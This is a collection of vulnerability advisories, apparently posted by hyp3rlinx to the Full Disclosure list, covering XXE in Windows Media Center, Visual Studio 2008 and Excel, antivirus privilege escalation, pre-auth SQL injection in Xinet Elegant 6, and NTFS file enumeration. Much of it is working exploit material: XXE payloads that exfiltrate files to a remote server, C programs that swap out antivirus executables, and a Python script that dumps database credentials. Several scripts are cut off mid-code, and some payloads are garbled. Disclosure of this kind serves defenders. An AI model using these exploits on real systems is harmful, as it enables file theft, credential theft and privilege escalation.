[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt [+] ISR: Apparition Security [Vendor] www.microsoft.com [Product] Microsoft Windows Media Center Windows Media Center is a discontinued digital video recorder and media player created by Microsoft. Media Center was first introduced to Windows in 2002 on Windows XP Media Center. [Vulnerability Type] XML External Entity MotW Bypass (Anniversary Edition) [CVE Reference] N/A [Security Issue] This vulnerability was originally released by me back on December 4, 2016, yet remains unfixed. Now, to make matters worse I will let you know "mark-of-the-web" MotW does not matter here, its just ignored. Meaning, if the .MCL file is internet downloaded it gets the MOTW but files still exfiltrated. Therefore, I am releasing this "anniversary edition" XXE with important motw informations. This is a fully working remote information disclosure vulnerability that still affects Windows 7. Windows 7 is near end of life this January, yet it is still used by many organizations. Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center but I have not tested it. Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker server Port 80 etc... Download the ".mcl" file using Microsoft Internet Explorer. Check the MotW where you downloaded the .mcl file dir /r and note the Zone.Identifier:$DATA exists. Open the file and BOOM! watch shitz leaving!... still vulnerable after all these years lol. OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro [Exploit/POC] 1) "M$-Wmc-Anniversary-Motw-Bypass.mcl" # PoC /FindMeThatBiotch.dtd"> %junk; %param666; %FindMeThatBiotch; ]> 2) "FindMeThatBiotch.dtd" /%data666;'>"> 3) Auto exploit PHP .mcl file downloader. /M$-Wmc-Anniversary-Motw-Bypass.mcl'; header('Content-Type: application/octet-stream'); header("Content-Transfer-Encoding: Binary"); header("Content-disposition: attachment; filename=\"" . basename($url) . "\""); readfile($url); ?> 4) python -m SimpleHTTPServer 80 [POC Video URL] https://www.youtube.com/watch?v=zcrATpBNAZ0 [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: December 4, 2016 MSRC "wont fix" Dec 2, 2019 : Re-Public "unfixed anniversary" Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Visual Studio 2008 Express IDE / XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Visual Studio 2008 Express IDE vcsetup.exe File hash: 62f764849e8fcdf8bfbc342685641304 Download: http://go.microsoft.com/?linkid=7729279 [Vulnerability Type] XML External Entity Injection 0Day [CVE Reference] N/A [Security Issue] Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst. By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the remote attackers server. Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit. [Vuln XXE file types] .snippet .i .s .asm .disco .lst .inc .srf .wsdl .rgs .xml This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory. [References] https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/ [Exploit/POC] "Evil.snippet" or any of the extensions mentioned above. http://127.0.0.1:8000/payload.dtd";> %dtd;]> &send; "payload.dtd" http://127.0.0.1:8000?%file;'>"> %all; python -m SimpleHTTPServer python -m http.server (Python3) [POC Video URL] https://www.youtube.com/watch?v=QOZlwzsbPrk [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: 3/24/2017 MSRC sent me link to "Definition of a Security Vulnerability" Also Product is also not supported anymore. December 1, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Excel 2016 v1901 / Import Error XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Excel 2016 v1901 Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS. It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. [CVE] N/A [Vulnerability Type] Error Import Based XML External Entity Injection [Security Issue] Excel query from file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as Html page" functionality upon receiving errors importing a specially crafted XML file. This can result in potential remote data exfiltration, user interaction is required to exploit this vulnerability. Tested successfuly Windows 10 .NET framework version v4.0.30319. C:\>dir /b %windir%\Microsoft.NET\Framework\v* v4.0.30319 [Exploit/POC] Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From File/From XML' 1) You will get error like: "Error: Unable to connect We encountered an error while trying to connect. The user will then get an option to 'Edit' where they can import the file as an HTML file Result Local data can be exfiltrated to remote server" 2) Excel will then give you option to 'Edit' and import as 'Html Page' from the drop down menu in Excel User has choose to import as HTML then XXE attack will succeed: e.g. 127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON= EGA80WOA.FO /1.1" 200 - Malicious XML file to load as New Data Query "test.xml" http://127.0.0.1:8000/payload.dtd'> %dtd;]> &send; [Network Access] Local [Severity] Medium [Disclosure Timeline] Vendor Notification: May 10, 2019 MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release. Engineering Team may or may not fix in a future version of the release." November 30, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Max Secure Anti Virus Plus - 19.0.4.020 / CVE-2019-19382 Insecure Permissions
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt [+] ISR: ApparitionSec [Vendor]www.maxpcsecure.com [Affected Product Code Base] Max Secure Anti Virus Plus - 19.0.4.020 File hash: ab1dda23ad3955eb18fdb75f3cbc308a msplusx64.exe [Vulnerability Type] Insecure Permissions [CVE Reference] CVE-2019-19382 [Security Issue] Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory. Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation. C:\Program Files\Max Secure Anti Virus Plus>cacls * | more C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F [Affected Component] Permissions on installation directory [Exploit/POC] #include #include #define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe" #define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe" #define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp" /* Max Secure Anti Virus Plus PoC By hyp3rlinx */ BOOL PWNED=FALSE; BOOL FileExists(LPCTSTR szPath){ DWORD dwAttrib = GetFileAttributes(szPath); return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); } void main(void){ if(!FileExists(DISABLED_TARGET)){ CopyFile(TARGET, TMP, FALSE); Sleep(1000); CopyFile(TMP, DISABLED_TARGET, FALSE); printf("[+] Max Secure Anti Virus Plus EoP PoC\n"); Sleep(1000); printf("[+] Disabled MaxSDUI.exe ...\n"); Sleep(300); }else{ PWNED=TRUE; } if(!PWNED){ char fname[MAX_PATH]; char newLoc[]=TARGET; DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH); if (size){ printf("[+] Copying exploit to vuln dir...\n"); Sleep(1000); CopyFile(fname, TARGET, FALSE); printf("[+] Replaced legit Max Secure EXE...\n"); Sleep(2000); printf("[+] Done!\n"); MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk"); Sleep(1000); exit(0); } }else{ if(FileExists(TMP)){ remove(TMP); } printf("[+] Max Secure Anti Virus Plus PWNED!!!\n"); printf("[+] hyp3rlinx\n"); system("pause"); } } [POC Video URL]https://www.youtube.com/watch?v=DXSV5geXkTw [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: November 19, 2019 Vendor: "received a reply they will fix soon" Status request: November 24, 2019 No replies other than automated response. November 29, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] NAPC Xinet Elegant 6 Asset Library Web Interface v6.1.655 / Pre-Auth SQL Injection 0Day
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt [+] ISR: ApparitionSec [Vendor] www.napc.com [Product] Xinet Elegant 6 Asset Library Web Interface v6.1.655 Web based interface for xinet asset management solution. [Vulnerability Type] Pre-Auth SQL Injection [CVE Reference] CVE-2019-19245 [Security Issue] NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows Pre-Authentication Error based SQL Injection via the /elegant6/login LoginForm[username] field when double quotes are used. The vulnerable version seems to be old, but it may still be possible to still find it deployed as I have. Vulnerable Parameter: LoginForm[username] (POST) Method. [Exploit/POC] import requests,time,re,sys,argparse #NAPC Xinet Elegant 6 Asset Library v6.1.655 #Pre-Auth SQL Injection 0day Exploit #By hyp3rlinx #ApparitionSec #== #This will dump tables, usernames and passwords in vulnerable versions #REQUIRE PARAMS: LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[username]=SQL&yt0 #SQL INJECTION VULN PARAM --> LoginForm[username] # IP="" PORT="80" URL="" NUM_INJECTS=20 k=1 j=0 TABLES=False CREDS=False SHOW_SQL_ERROR=False def vuln_ver_chk(): global IP, PORT TARGET = "http://"+IP+":"+PORT+"/elegant6/login"; response = requests.get(TARGET) if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content): print "[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655." return True print "[!] Version not vulnerable :(" return False def sql_inject_request(SQL): global IP, PORT URL = "http://"+IP+":"+PORT+"/elegant6/login"; tmp="" headers = {'User-Agent': 'Mozilla/5.0'} payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL} session = requests.Session() res = session.post(URL,headers=headers,data=payload) idx = res.content.find('CDbCommand') # Start of SQL Injection Error in response idx2 = res.content.find('key 1') # End of SQL Injection Error in response return res.content[idx : idx2+3] #Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc def inc(): global k,j while j < NUM_INJECTS: j+=1 if k !=1: k+=1 return str(j)+','+str(k) def tidy_up(results): global CREDS idx = results.find("'") if idx != -1: idx2 = results.rfind("'") if not CREDS: return results[idx + 1: idx2 -2] else: return results[idx + 2: idx2] def breach(i): global k,j,NUM_INJECTS,SHOW_SQL_ERROR result="" #Dump Usernames & Passwords if CREDS: if i % 2 == 0: target='username' else: target='password' SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))' 'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -') if not SHOW_SQL_ERROR: result = tidy_up(sql_inject_request(SQL)) else: result = sql_inject_request(SQL)+"\n" print "[+] Dumping "+target+": "+result #Dump Tables if TABLES: while j < NUM_INJECTS: nums = inc() SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()' 'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -') if not SHOW_SQL_ERROR: result = tidy_up(sql_inject_request(SQL)) else: result = sql_inject_request(SQL) + "\n" print "[+] Dumping Table... " +result time.sleep(0.3) def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-i", "--ip_address", help=".") parser.add_argument("-p", "--port", help="Port, Default is 80") parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.") parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.") parser.add_argument("-m", "--max_injects", nargs="?", const="1"
[FD] ScanGuard Antivirus (latest version) / Insecure Permissions
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt [+] ISR: ApparitionSec [Vendor] https://www.scanguard.com [Product] ScanGuard Antivirus ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d Complete Antivirus & Security Software [Vulnerability Type] Insecure Permissions [CVE Reference] CVE-2019-18895 [Affected Product Code Base] ScanGuard Antivirus - latest [Affected Component] Permissions on installation directory [Attack Type] Local [Impact Code execution] true [Impact Escalation of Privileges] true [Impact Information Disclosure] true [Attack Vectors] Low integrity malware or non-privileged user replaces an executable to gain Admin privileges. [Reference] https://support.scanguard.com/en/kb/22/upgrades-available [Security Issue] Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to privilege escalation via a Trojan horse executable file. The product sets weak access control restrictions, as permissions are set to Full Control for Everyone group. This can allow low integrity malware the ability to replace ScanGuard executables. C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F Everyone:(OI)(CI)(ID)F NT SERVICE\TrustedInstaller:(ID)F NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F [Exploit/POC] #include #include #define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe" #define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf" /* ScanGuard EoP PoC By hyp3rlinx */ BOOL PWNED=FALSE; BOOL FileExists(LPCTSTR szPath){ DWORD dwAttrib = GetFileAttributes(szPath); return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); } void main(void){ if(!FileExists(DISABLED_TARGET)){ rename(TARGET, DISABLED_TARGET); printf("[+] ScanGuard Antivirus EoP PoC\n"); Sleep(300); printf("[+] Disabled ScanGuard.exe ...\n"); Sleep(300); }else{ PWNED=TRUE; } char fname[MAX_PATH]; char newLoc[]=TARGET; DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH); if (size){ if(!PWNED){ printf("[+] Copying exploit to vuln dir...\n"); Sleep(300); CopyFile(fname, newLoc, FALSE); printf("[+] Replaced legit ScanGuard...\n"); Sleep(300); printf("[+] Done!\n"); Sleep(300); MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk"); Sleep(2000); exit(0); }else{ if(FileExists("ScamGuard.lnk")){ system("DEL /f ScamGuard.lnk"); } printf("[+] ScamGuard PWNED!!!"); printf("[+] By hyp3rlinx\n"); system("pause"); } } } [Disclosure Timeline] Vendor Notification: September 16, 2019 Received vendor acknowledgement: September 16, 2019 Second contact follow up: September 29, 2019 No more vendor replies. November 12, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Trend Micro Anti-Threat Toolkit (ATTK) <= v1.62.0.1218 Remote Code Execution 0day CVE-2019-9491
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt [+] ISR: Apparition Security [Vendor]www.trendmicro.com [Product] Trend Micro Anti-Threat Toolkit (ATTK) 1.62.0.1218 and below Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean infections. It can be used to perform system forensic scans and clean the following infection types: General malware infection Master boot record Infection CIDOX/ RODNIX infection Rootkit infection Zbot infection Cryptolocker infection etc.. [Vulnerability Type] Remote Code Execution [CVE Reference] CVE-2019-9491 [Security Issue] Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if a malware author happens to use the vulnerable naming convention of "cmd.exe" or "regedit.exe" and the malware can be placed in the vacinity of the ATTK when a scan is launched by the end user. Since the ATTK is signed by verified publisher and therefore assumed trusted any MOTW security warnings are bypassed if the malware was internet downloaded, also it can become a persistence mechanism as each time the Anti-Threat Toolkit is run so can an attackers malware. Standalone affected components of ATTK and other integrations (e.g. WCRY Patch Tool, OfficeScan Toolbox, etc.) attk_collector_cli_x64.exe Hash: e8503e9897fd56eac0ce3c3f6db24fb1 TrendMicroRansomwareCollector64.r09.exe Hash: 798039027bb4363dcfd264c14267375f attk_ScanCleanOnline_gui_x64.exe Hash: f1d2ca4b14368911c767873cdbc194ed [References]https://success.trendmicro.com/solution/000149878 *All versions of the ATTK have been updated with the newer version. Anti-Threat Toolkit (ATTK) 1.62.0.1223 [Exploit/POC] Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or "regedit.exe". Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed. #include void main(void){ puts("Trend Micro Anti-Threat Toolkit PWNED!"); puts("Discovery: hyp3rlinx"); puts("CVE-2019-9491\n"); WinExec("powershell", 0); } [POC Video URL]https://www.youtube.com/watch?v=HBrRVe8WCHs [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: September 9, 2019 Vendor confirms vulnerability: September 25, 2019 Vendor requests to coordinate advisory: September 25, 2019 October 19, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] NtFileSins v2.1 / Windows NTFS Privileged File Access Enumeration Tool
Fixed a bug in the save report logic. from subprocess import Popen, PIPE import sys,argparse,re # NtFileSins v2.1 # Fixed: save() logic to log report in case no Zone.Identifiers found. # Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet. # # Windows File Enumeration Intel Gathering. # Standard users can prove existence of privileged user artifacts. # # Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message, # when a file exists or doesn't exist, when restricted access is attempted by another user. # # However, accessing files directly by attempting to "open" them from cmd.exe shell, # we can determine existence by compare inconsistent Windows error messages. # # Requirements: 1) target users with >= privileges (not admin to admin). # 2) artifacts must contain a dot "." or returns false positives. # # Windows message "Access Denied" = Exists # Windows message "The system cannot find the file" = Not exists # Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command, # operable program or batch file" = Admin to Admin so this script is not required. # # Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose. # For evil or maybe check for basic malware IOC existence on disk with user-only rights. # #==# # NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1 # # By John Page (aka hyp3rlinx) # # Apparition Security # #==# BANNER=''' _ ___ ___ _ / | / /_ __/ (_) /__ / ___/(_)___ _ / |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/ / /| / / / / __/ / / / __/__/ / / / / (__ ) /_/ |_/ /_/ /_/ /_/_/\___//_/_/ /_// v2.1 By hyp3rlinx ApparitionSec ''' sin_cnt=0 internet_sin_cnt=0 found_set=set() zone_set=set() ARTIFACTS_SET=set() ROOTDIR = "c:/Users/" ZONE_IDENTIFIER=":Zone.Identifier:$DATA" USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures", "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"] APPDATA_DIR=["AppData/Local/Temp"] EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat", ".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"]) REPORT="NtFileSins_Log.txt" def usage(): print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n" print '-u victim -d Searches -a "MS17-020 - Google Search.url"' print '-u victim -a ""' print "-u victim -d Downloads -a -s" print '-u victim -d Contacts -a "Mike N.contact"' print "-u victim -a APT.txt -b -n" print "-u victim -d -z Desktop/MyFiles -a <.name>" print "-u victim -d Searches -a .search-ms" print "-u victim -d . -a " print "-u victim -d desktop -a inverted-crosses.mp3 -b" print "-u victim -d Downloads -a APT.exe -b" print "-u victim -f list_of_files.txt" print "-u victim -f list_of_files.txt -b -s" print "-u victim -f list_of_files.txt -x .txt" print "-u victim -d desktop -f list_of_files.txt -b" print "-u victim -d desktop -f list_of_files.txt -x .rar" print "-u victim -z -s -f list_of_files.txt" def parse_args(): parser.add_argument("-u", "--user", help="Privileged user target") parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .") parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.") parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/
[FD] NtFileSins v2 / Windows NTFS Privileged File Access Enumeration Tool
NtFileSins v2, exploits Windows privileged file access enumeration vulnerability to gather intelligence on privileged users. This version includes Zone.Identifier checks to see if any discovered files were internet downloaded. from subprocess import Popen, PIPE import sys,argparse,re # NtFileSins v2 # Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet. # # Windows File Enumeration Intel Gathering. # Standard users can prove existence of privileged user artifacts. # # Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message, # when a file exists or doesn't exist, when restricted access is attempted by another user. # # However, accessing files directly by attempting to "open" them from cmd.exe shell, # we can determine existence by compare inconsistent Windows error messages. # # Requirements: 1) target users with >= privileges. # 2) artifacts must contain a dot "." or returns false positives. # # Windows message "Access Denied" = Exists # Windows message "The system cannot find the file" = Not exists # Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command, # operable program or batch file" = Admin to Admin so this script is not required. # # Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose. # For evil or maybe check for basic malware IOC existence on disk with user-only rights. # #=# # NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2. # # By John Page (aka hyp3rlinx)# # Apparition Security # #=# BANNER=''' _ ___ ___ _ / | / /_ __/ (_) /__ / ___/(_)___ _ / |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/ / /| / / / / __/ / / / __/__/ / / / / (__ ) /_/ |_/ /_/ /_/ /_/_/\___//_/_/ /_// v2 By hyp3rlinx ApparitionSec ''' sin_cnt=0 internet_sin_cnt=0 found_set=set() zone_set=set() ARTIFACTS_SET=set() ROOTDIR = "c:/Users/" ZONE_IDENTIFIER=":Zone.Identifier:$DATA" USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures", "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"] APPDATA_DIR=["AppData/Local/Temp"] EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat", ".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"]) REPORT="NtFileSins_Log.txt" def usage(): print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n" print '-u victim -d Searches -a "MS17-020 - Google Search.url"' print '-u victim -a ""' print "-u victim -d Downloads -a -s" print '-u victim -d Contacts -a "Mike N.contact"' print "-u victim -a APT.txt -b -n" print "-u victim -d -z Desktop/MyFiles -a <.name>" print "-u victim -d Searches -a .search-ms" print "-u victim -d . -a " print "-u victim -d desktop -a inverted-crosses.mp3 -b" print "-u victim -d Downloads -a APT.exe -b" print "-u victim -f list_of_files.txt" print "-u victim -f list_of_files.txt -b -s" print "-u victim -f list_of_files.txt -x .txt" print "-u victim -d desktop -f list_of_files.txt -b" print "-u victim -d desktop -f list_of_files.txt -x .rar" print "-u victim -z -s -f list_of_files.txt" def parse_args(): parser.add_argument("-u", "--user", help="Privileged user target") parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .") parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.") parser.add_argument("-t", "--appdata&quo
[FD] Windows NTFS / Privileged File Access Enumeration
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows NTFS NTFS is a proprietary journaling file system developed by Microsoft. Starting with Windows NT 3.1, it is the default file system of the Windows NT family. [Vulnerability Type] Privileged File Access Enumeration [CVE Reference] N/A [Security Issue] Attackers possessing user-only rights can gather intelligence or profile other user account activities by brute forcing a correct file name. This is possible because Windows returns inconsistent error messages when accessing unauthorized files that contain a valid extension or have a "." (dot) as part of the file or folder name. Typically, you see enumeration in web-application attacks which target account usernames. In this case we are targeting the filenames of other users, maybe we need to locate files up front that we wish to steal possibly prior to launching say an XXE exploit to steal those files or maybe we just passively sniff the accounts directories to profile the mark and or learn their daily activities. Standard account users attempting to open another users files or folders that do not contain a valid extension or dot "." in its filename are always issued the expected "Access is denied" system error message. However, for files that contain a (dot) in the filename and that also don't exist, the system echoes the following attacker friendly warning: "The system cannot find the file". This error message inconsistency allows attackers to infer files EXIST, because any other time we would get "The system cannot find the file". Example, the Windows commands DIR or TYPE always greet attackers with an expected "Access is denied" message, whether the file exists or not. This helps protect users from having their local files known to attackers, since the system returns the same message regardless if files exist or not when using those commands. Those commands output messages are not affected by the file having a valid extension or not. However, we can bypass that protection by avoiding the Windows DIR or TYPE commands and instead attempt to directly open any inaccessible users file on the command line much like calling a program and pressing the enter key. After the Win32 API function CreateFile is called an it returns either: 1) "The system cannot find the file" 2) "Access is denied" c:\>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact The system cannot find the file < DOES NOT EXIST c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact Access is denied. <= EXISTS c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.con The system cannot find the file < DOES NOT EXIST c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever Access is denied. <= FALSE POSITIVE NO EXTENSION PRESENT IN THE FILENAME >From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe or related config files on disk with user-only rights, instead of authenticating with admin rights as a quick paranoid first pass. Example, if malware hides itself by unlinking themselves from the EPROCESS list in memory or using programs like WinRAP to hide processess from Windows TaskMgr, we may not discover them even if using tasklist command. The EPROCESS structure and flink/blink is how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing 